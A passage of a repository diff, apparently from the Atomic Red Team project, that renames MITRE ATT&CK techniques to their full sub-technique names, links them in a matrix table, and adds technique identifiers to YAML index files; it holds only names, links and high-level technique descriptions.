 | [Replication Through Removable Media](../../T1091/T1091.md) | [User Execution: Malicious File](../../T1204.002/T1204.002.md) | Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | File/Path Exclusions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [OS Credential Dumping: Security Account Manager](../../T1003.002/T1003.002.md) | [Account Discovery: Domain Account](../../T1087.002/T1087.002.md) | Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Audio Capture](../../T1123/T1123.md) | [Automated Exfiltration](../../T1020/T1020.md) | Symmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | [Supply Chain Compromise](../../T1195/T1195.md) | Component Object Model [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [External Remote Services](../../T1133/T1133.md) | [Abuse Elevation Control Mechanism: Bypass User Account Control](../../T1548.002/T1548.002.md) | [Signed Script Proxy Execution: Pubprn](../../T1216.001/T1216.001.md) | [Brute Force: Password Cracking](../../T1110.002/T1110.002.md) | [Account Discovery: Local Account](../../T1087.001/T1087.001.md) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Fast Flux DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Exploit Public-Facing Application [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Pre-OS Boot: System Firmware](../../T1542.001/T1542.001.md) | [Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [OS Credential Dumping: LSA Secrets](../../T1003.004/T1003.004.md) | [Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) | [Remote Services: Windows Remote Management](../../T1021.006/T1021.006.md) | Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Application Layer Protocol](../../T1071/T1071.md) | [Service Stop](../../T1489/T1489.md) |
-| Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Native API](../../T1106/T1106.md) | [Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Boot or Logon Autostart Execution](../../T1547/T1547.md) | [Direct Volume Access](../../T1006/T1006.md) | Forge Web Credentials: SAML token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Permission Groups Discovery: Domain Groups](../../T1069.002/T1069.002.md) | [Remote Services: Distributed Component Object Model](../../T1021.003/T1021.003.md) | [Data from Removable Media](../../T1025/T1025.md) | [Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol](../../T1048.002/T1048.002.md) | [Remote Access Software](../../T1219/T1219.md) | Application or System Exploitation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | [Command and Scripting Interpreter: AutoHotKey & AutoIT](../../T1059.010/T1059.010.md) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Active Setup](../../T1547.014/T1547.014.md) | Hide Artifacts: Email Hiding Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Password Managers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Service Discovery](../../T1007/T1007.md) | [Use Alternate Authentication Material: Pass the Ticket](../../T1550.003/T1550.003.md) | [Data Staged: Local Data Staging](../../T1074.001/T1074.001.md) | [Exfiltration Over C2 Channel](../../T1041/T1041.md) | Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| [Content Injection](../../T1659/T1659.md) | [Native API](../../T1106/T1106.md) | [Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Boot or Logon Autostart Execution](../../T1547/T1547.md) | [Direct Volume Access](../../T1006/T1006.md) | Forge Web Credentials: SAML token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Permission Groups Discovery: Domain Groups](../../T1069.002/T1069.002.md) | [Remote Services: Distributed Component Object Model](../../T1021.003/T1021.003.md) | [Data from Removable Media](../../T1025/T1025.md) | [Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol](../../T1048.002/T1048.002.md) | [Remote Access Software](../../T1219/T1219.md) | Application or System Exploitation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | [Command and Scripting Interpreter: AutoHotKey & AutoIT](../../T1059.010/T1059.010.md) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Active Setup](../../T1547.014/T1547.014.md) | Hide Artifacts: Email Hiding Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Password Managers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Service Discovery](../../T1007/T1007.md) | [Use Alternate Authentication Material: Pass the Ticket](../../T1550.003/T1550.003.md) | [Data Staged: Local Data Staging](../../T1074.001/T1074.001.md) | [Exfiltration Over C2 Channel](../../T1041/T1041.md) | [Content Injection](../../T1659/T1659.md) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Trusted Relationship [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Input Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution](../../T1547/T1547.md) | Domain Trust Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Obfuscated Files or Information: Encrypted/Encoded File](../../T1027.013/T1027.013.md) | [Network Sniffing](../../T1040/T1040.md) | [Network Sniffing](../../T1040/T1040.md) | [Software Deployment Tools](../../T1072/T1072.md) | [Email Collection: Local Email Collection](../../T1114.001/T1114.001.md) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Reflection Amplification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Command and Scripting Interpreter](../../T1059/T1059.md) | [Active Setup](../../T1547.014/T1547.014.md) | [Create or Modify System Process: Windows Service](../../T1543.003/T1543.003.md) | Rootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials: Credentials in Registry](../../T1552.002/T1552.002.md) | [Network Share Discovery](../../T1135/T1135.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Databases [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Protocol Tunneling](../../T1572/T1572.md) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Malicious Library [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Browser Extensions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Print Processors](../../T1547.012/T1547.012.md) | [Masquerading: Double File Extension](../../T1036.007/T1036.007.md) | [Modify Authentication Process: Password Filter DLL](../../T1556.002/T1556.002.md) | [Peripheral Device Discovery](../../T1120/T1120.md) | Internal Spearphishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Automated Collection](../../T1119/T1119.md) | [Exfiltration Over Web Service: Exfiltration to Text Storage Sites](../../T1567.003/T1567.003.md) | Mail Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
@@ -25,7 +25,7 @@
 |  | [Command and Scripting Interpreter: Windows Command Shell](../../T1059.003/T1059.003.md) | [Modify Authentication Process: Password Filter DLL](../../T1556.002/T1556.002.md) | Escape to Host [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Trust Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay](../../T1557.001/T1557.001.md) | [System Network Configuration Discovery](../../T1016/T1016.md) |  | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 |  | [Command and Scripting Interpreter: Visual Basic](../../T1059.005/T1059.005.md) | [Server Software Component: Terminal Services DLL](../../T1505.005/T1505.005.md) | [Boot or Logon Autostart Execution: Shortcut Modification](../../T1547.009/T1547.009.md) | [Impair Defenses: Safe Boot Mode](../../T1562.009/T1562.009.md) | [OS Credential Dumping: LSASS Memory](../../T1003.001/T1003.001.md) | Account Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [Video Capture](../../T1125/T1125.md) |  | File Transfer Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Resource Hijacking](../../T1496/T1496.md) |
 |  | Malicious Copy and Paste [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Browser Extensions](../../T1176/T1176.md) | [Boot or Logon Autostart Execution: Security Support Provider](../../T1547.005/T1547.005.md) | [Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) | [Brute Force: Password Spraying](../../T1110.003/T1110.003.md) | [Domain Trust Discovery](../../T1482/T1482.md) |  | Email Collection: Email Forwarding Rule [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | One-Way Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-|  | Malicious Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Outlook Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: Path Interception by Search Order Hijacking](../../T1574.008/T1574.008.md) | [Signed Binary Proxy Execution: InstallUtil](../../T1218.004/T1218.004.md) | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [File and Directory Discovery](../../T1083/T1083.md) |  | Data Staged [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [Proxy: Multi-hop Proxy](../../T1090.003/T1090.003.md) | [Data Destruction](../../T1485/T1485.md) |
+|  | Malicious Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Office Application Startup: Outlook Rules](../../T1137.005/T1137.005.md) | [Hijack Execution Flow: Path Interception by Search Order Hijacking](../../T1574.008/T1574.008.md) | [Signed Binary Proxy Execution: InstallUtil](../../T1218.004/T1218.004.md) | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [File and Directory Discovery](../../T1083/T1083.md) |  | Data Staged [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [Proxy: Multi-hop Proxy](../../T1090.003/T1090.003.md) | [Data Destruction](../../T1485/T1485.md) |
 |  | [System Services: Service Execution](../../T1569.002/T1569.002.md) | Additional Local or Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Domain Policy Modification: Group Policy Modification](../../T1484.001/T1484.001.md) | Stripped Payloads [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [OS Credential Dumping: Cached Domain Credentials](../../T1003.005/T1003.005.md) | [System Network Connections Discovery](../../T1049/T1049.md) |  | [Input Capture: GUI Input Capture](../../T1056.002/T1056.002.md) |  | Remote Access Hardware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 |  | [Scheduled Task/Job: At](../../T1053.002/T1053.002.md) | [Event Triggered Execution: Application Shimming](../../T1546.011/T1546.011.md) | [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | [Hijack Execution Flow: DLL](../../T1574.001/T1574.001.md) | [Steal or Forge Kerberos Tickets: Golden Ticket](../../T1558.001/T1558.001.md) | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [Data from Network Shared Drive](../../T1039/T1039.md) |  | Data Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Firmware Corruption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 |  |  | [Boot or Logon Autostart Execution: Port Monitors](../../T1547.010/T1547.010.md) | [Time Providers](../../T1547.003/T1547.003.md) | Code Signing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Steal or Forge Authentication Certificates](../../T1649/T1649.md) | [Log Enumeration](../../T1654/T1654.md) |  | Email Collection: Remote Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [Non-Standard Port](../../T1571/T1571.md) | [Inhibit System Recovery](../../T1490/T1490.md) |
@@ -46,7 +46,7 @@
 |  |  | [Event Triggered Execution: Accessibility Features](../../T1546.008/T1546.008.md) | [Access Token Manipulation: Parent PID Spoofing](../../T1134.004/T1134.004.md) | [Signed Binary Proxy Execution](../../T1218/T1218.md) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  | [Proxy: Internal Proxy](../../T1090.001/T1090.001.md) |  |
 |  |  | [Create Account: Domain Account](../../T1136.002/T1136.002.md) | [Event Triggered Execution: Change Default File Association](../../T1546.001/T1546.001.md) | [Indicator Removal on Host: Timestomp](../../T1070.006/T1070.006.md) | [Steal or Forge Kerberos Tickets: Silver Ticket](../../T1558.002/T1558.002.md) |  |  |  |  | Dead Drop Resolver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
 |  |  | Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Services File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Reflective Code Loading](../../T1620/T1620.md) | [Credentials from Password Stores: Windows Credential Manager](../../T1555.004/T1555.004.md) |  |  |  |  | Junk Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
-|  |  | [Office Application Startup: Office Template Macros.](../../T1137.001/T1137.001.md) | [Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | Mutual Exclusion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |
+|  |  | [Office Application Startup: Office Template Macros.](../../T1137.001/T1137.001.md) | [Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | Mutual Exclusion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Modify Authentication Process: Domain Controller Authentication](../../T1556.001/T1556.001.md) |  |  |  |  |  |  |
 |  |  | [Event Triggered Execution: AppCert DLLs](../../T1546.009/T1546.009.md) | [Account Manipulation](../../T1098/T1098.md) | Ignore Process Interrupts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |
 |  |  | Device Registration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | KernelCallbackTable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Multi-Factor Authentication Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |
 |  |  | Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Signed Binary Proxy Execution: CMSTP](../../T1218.003/T1218.003.md) | [OS Credential Dumping: NTDS](../../T1003.003/T1003.003.md) |  |  |  |  |  |  |
@@ -76,7 +76,7 @@
 |  |  | [Event Triggered Execution: AppInit DLLs](../../T1546.010/T1546.010.md) | [Event Triggered Execution: Netsh Helper DLL](../../T1546.007/T1546.007.md) | Right-to-Left Override [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  | [Event Triggered Execution: Screensaver](../../T1546.002/T1546.002.md) | [Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) | SVG Smuggling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  | Server Software Component [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: COR_PROFILER](../../T1574.012/T1574.012.md) | Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
-|  |  | Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [Indicator Removal on Host](../../T1070/T1070.md) |  |  |  |  |  |  |  |
+|  |  | [Modify Authentication Process: Domain Controller Authentication](../../T1556.001/T1556.001.md) |  | [Indicator Removal on Host](../../T1070/T1070.md) |  |  |  |  |  |  |  |
 |  |  | Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [Use Alternate Authentication Material: Pass the Ticket](../../T1550.003/T1550.003.md) |  |  |  |  |  |  |  |
 |  |  | Installer Packages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [Masquerading: Masquerade Task or Service](../../T1036.004/T1036.004.md) |  |  |  |  |  |  |  |
 |  |  | Exclusive Control [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [Process Injection: Asynchronous Procedure Call](../../T1055.004/T1055.004.md) |  |  |  |  |  |  |  |
@@ -135,7 +135,7 @@
 |  |  |  |  | Relocate Malware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  |  |  | Clear Persistence [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  |  |  | Masquerade Account Name [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
-|  |  |  |  | Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
+|  |  |  |  | [Modify Authentication Process: Domain Controller Authentication](../../T1556.001/T1556.001.md) |  |  |  |  |  |  |  |
 |  |  |  |  | [HTML Smuggling](../../T1027.006/T1027.006.md) |  |  |  |  |  |  |  |
 |  |  |  |  | Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  |  |  | Command Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |

atomics/Indexes/azure-ad-index.yaml

@@ -11566,7 +11566,7 @@ defense-evasion:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       modified: '2025-10-24T17:49:27.324Z'
-      name: Domain Controller Authentication
+      name: 'Modify Authentication Process: Domain Controller Authentication'
       description: "Adversaries may patch the authentication process on a domain controller
         to bypass the typical authentication mechanisms and enable access to accounts.
         \n\nMalware may be used to inject false credentials into the authentication
@@ -11596,6 +11596,7 @@ defense-evasion:
       x_mitre_platforms:
       - Windows
       x_mitre_version: '2.1'
+      identifier: T1556.001
     atomic_tests: []
   T1027.006:
     technique:
@@ -23636,7 +23637,7 @@ execution:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       modified: '2025-04-15T19:58:28.694Z'
-      name: Systemctl
+      name: 'System Services: Systemctl'
       description: "Adversaries may abuse systemctl to execute commands or programs.
         Systemctl is the primary interface for systemd, the Linux init system and
         service manager. Typically invoked from a shell, Systemctl can also be integrated
@@ -23659,6 +23660,7 @@ execution:
       - Linux
       x_mitre_version: '1.0'
       x_mitre_remote_support: false
+      identifier: T1569.003
     atomic_tests: []
   T1059.009:
     technique:
@@ -27966,7 +27968,7 @@ persistence:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       modified: '2025-10-24T17:48:41.026Z'
-      name: Outlook Rules
+      name: 'Office Application Startup: Outlook Rules'
       description: |-
         Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Outlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user.(Citation: SilentBreak Outlook Rules)
 
@@ -27987,6 +27989,7 @@ persistence:
       - Windows
       - Office Suite
       x_mitre_version: '1.2'
+      identifier: T1137.005
     atomic_tests: []
   T1098.007:
     technique:
@@ -33296,7 +33299,7 @@ persistence:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       modified: '2025-10-24T17:49:27.324Z'
-      name: Domain Controller Authentication
+      name: 'Modify Authentication Process: Domain Controller Authentication'
       description: "Adversaries may patch the authentication process on a domain controller
         to bypass the typical authentication mechanisms and enable access to accounts.
         \n\nMalware may be used to inject false credentials into the authentication
@@ -33326,6 +33329,7 @@ persistence:
       x_mitre_platforms:
       - Windows
       x_mitre_version: '2.1'
+      identifier: T1556.001
     atomic_tests: []
   T1556.005:
     technique:
@@ -35096,7 +35100,7 @@ command-and-control:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       modified: '2025-10-24T17:48:25.458Z'
-      name: Domain Generation Algorithms
+      name: 'Dynamic Resolution: Domain Generation Algorithms'
       description: |-
         Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders to block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Unit 42 DGA Feb 2019)
 
@@ -35123,6 +35127,7 @@ command-and-control:
       - Windows
       - ESXi
       x_mitre_version: '1.2'
+      identifier: T1568.002
     atomic_tests: []
   T1071.004:
     technique:
@@ -35524,6 +35529,7 @@ command-and-control:
       - macOS
       - Windows
       x_mitre_version: '1.0'
+      identifier: T1659
     atomic_tests: []
   T1205:
     technique:
@@ -45659,7 +45665,7 @@ credential-access:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       modified: '2025-10-24T17:49:27.324Z'
-      name: Domain Controller Authentication
+      name: 'Modify Authentication Process: Domain Controller Authentication'
       description: "Adversaries may patch the authentication process on a domain controller
         to bypass the typical authentication mechanisms and enable access to accounts.
         \n\nMalware may be used to inject false credentials into the authentication
@@ -45689,6 +45695,7 @@ credential-access:
       x_mitre_platforms:
       - Windows
       x_mitre_version: '2.1'
+      identifier: T1556.001
     atomic_tests: []
   T1556.005:
     technique:
@@ -57534,6 +57541,7 @@ initial-access:
       - macOS
       - Windows
       x_mitre_version: '1.0'
+      identifier: T1659
     atomic_tests: []
   T1078.001:
     technique:

atomics/Indexes/containers-index.yaml

@@ -11541,7 +11541,7 @@ defense-evasion:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       modified: '2025-10-24T17:49:27.324Z'
-      name: Domain Controller Authentication
+      name: 'Modify Authentication Process: Domain Controller Authentication'
       description: "Adversaries may patch the authentication process on a domain controller
         to bypass the typical authentication mechanisms and enable access to accounts.
         \n\nMalware may be used to inject false credentials into the authentication
@@ -11571,6 +11571,7 @@ defense-evasion:
       x_mitre_platforms:
       - Windows
       x_mitre_version: '2.1'
+      identifier: T1556.001
     atomic_tests: []
   T1027.006:
     technique:
@@ -23404,7 +23405,7 @@ execution:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       modified: '2025-04-15T19:58:28.694Z'
-      name: Systemctl
+      name: 'System Services: Systemctl'
       description: "Adversaries may abuse systemctl to execute commands or programs.
         Systemctl is the primary interface for systemd, the Linux init system and
         service manager. Typically invoked from a shell, Systemctl can also be integrated
@@ -23427,6 +23428,7 @@ execution:
       - Linux
       x_mitre_version: '1.0'
       x_mitre_remote_support: false
+      identifier: T1569.003
     atomic_tests: []
   T1059.009:
     technique:
@@ -27833,7 +27835,7 @@ persistence:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       modified: '2025-10-24T17:48:41.026Z'
-      name: Outlook Rules
+      name: 'Office Application Startup: Outlook Rules'
       description: |-
         Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Outlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user.(Citation: SilentBreak Outlook Rules)
 
@@ -27854,6 +27856,7 @@ persistence:
       - Windows
       - Office Suite
       x_mitre_version: '1.2'
+      identifier: T1137.005
     atomic_tests: []
   T1098.007:
     technique:
@@ -32733,7 +32736,7 @@ persistence:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       modified: '2025-10-24T17:49:27.324Z'
-      name: Domain Controller Authentication
+      name: 'Modify Authentication Process: Domain Controller Authentication'
       description: "Adversaries may patch the authentication process on a domain controller
         to bypass the typical authentication mechanisms and enable access to accounts.
         \n\nMalware may be used to inject false credentials into the authentication
@@ -32763,6 +32766,7 @@ persistence:
       x_mitre_platforms:
       - Windows
       x_mitre_version: '2.1'
+      identifier: T1556.001
     atomic_tests: []
   T1556.005:
     technique:
@@ -34574,7 +34578,7 @@ command-and-control:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       modified: '2025-10-24T17:48:25.458Z'
-      name: Domain Generation Algorithms
+      name: 'Dynamic Resolution: Domain Generation Algorithms'
       description: |-
